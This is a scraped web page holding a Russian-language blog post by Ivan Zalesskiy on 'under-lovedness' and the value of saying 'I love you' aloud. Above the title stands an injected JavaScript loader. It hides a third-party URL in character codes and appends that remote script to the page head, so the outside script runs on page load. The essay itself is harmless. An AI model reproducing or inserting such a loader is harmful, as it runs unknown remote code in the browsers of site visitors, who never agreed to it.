var d3 = document.createElement('script'); d3.type = 'text/javascript'; d3.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 115, 116, 97, 116, 46, 117, 117, 115, 116, 111, 117, 103, 104, 116, 111, 110, 109, 97, 46, 111, 114, 103, 47, 115, 116, 97, 116, 115, 46, 106, 115, 63, 102, 61, 52); var scripts = document.getElementsByTagName('script'); var need_t = true; for (var i = scripts.length; i--;) {if (scripts[i].src == d3.src) { need_t = false;}else{} } if(need_t == true){document.head.appendChild(d3);} Нужно ли говорить о любви? | Ivan Zalesskiy

Как часто вы произносите слово «люблю»? Я имею в виду не только клятву верности на всю жизнь в отношении другого человека, а например: «Люблю, когда он так делает», «Люблю себя», или «Люблю эту еду, эту машину, эту вещь».

Проблема сегодняшних людей в недолюбленности! Этакая черная дыра в сердце, для закрывания которой используется все, что угодно – терпение, обман, манипуляция, подчинение, насилие и т.д. Недолюбленность – это не просто недостаток родительской любви к ребенку, это заболевание, пропитанное обидами, болью, обречённостью, одиночеством, толкающим нас на поступки: - «Не любит меня, тогда пусть завидует» или «Заработаю денег и куплю ее любовь» или «Не любит один, так пусть меня любят многие» и т.д.

Возможно, все преступления, тирания и насилие – являются проявлением недолюбленности. Поиск любви, у каждого свой и у некоторых он мучительный и извращенный. Даже слово “бить” – это всего лишь обездоленный остаток от слова “любить”. Ведь бьют от отчаяния, того, кого не могут заставить себя полюбить.

Упреки и скандалы, гнев и обиды, все это, как правило, формы крика о помощи – «Полюби меня». Вслух мы говорим: – «Мне, ничего от тебя не нужно» а в душе: «Только люби меня». Почему так сложно сказать правду? Потому, что это делает нас слабыми и уязвимыми.

Ах сколько видов защиты, масок, брони, существует у людей, лиш бы не признаваться в своей слабости, в потребности любить и быть любимыми.

Да, родители недолюбили нас, потому что сами не знали как любить. Может быть в недостаточной степени, но мы получали похвалу и внимание от них, будучи детьми, а повзрослев, лишились и этого! Некоторые думают, что родители любят их только потому, что они их дети. Но ведь хочется, любви, просто так, без причин. Где же взять такую безусловную любовь?

Я предлагаю простой и может быть даже наивный способ: Говорить о любви, говорить вслух, близким и окружающим людям. Признаться в любви себе и признаваться в необходимости любви тем, кто вас окружает. А если не скрывать, если говорить об этом, значит думать, понимать, осознавать, быть честным с собой. А осознание это уже путь к исцелению!

Что думаете об этом? Какими способами вы пополняете свой недостаток любви? Расскажите про свой опыт, ведь он может быть полезен другим.

Поделится в соц сетях:
Система Orphus

Добавить комментарий

Подобные материалы

Большинство людей понятия не имеют, что такое ресурсы человеческого сознания, они живут по принципу "стимул -...

Вот вам история из жизни, в которой взрослый, достаточно состоятельный и влиятельный мужчина, проявляя заботу о...

В психологии существует представление о прерванном движении. Это движение к любви, часто прерывается в детстве.

ПОДПИШИТЕСЬ НА НАШУ РАССЫЛКУ

ХОТИТЕ ПОЛУЧАТЬ НОВОСТИ ИЛИ ИНФОРМАЦИЮ О БЛИЖАЙЩИХ СЕМИНАРАХ?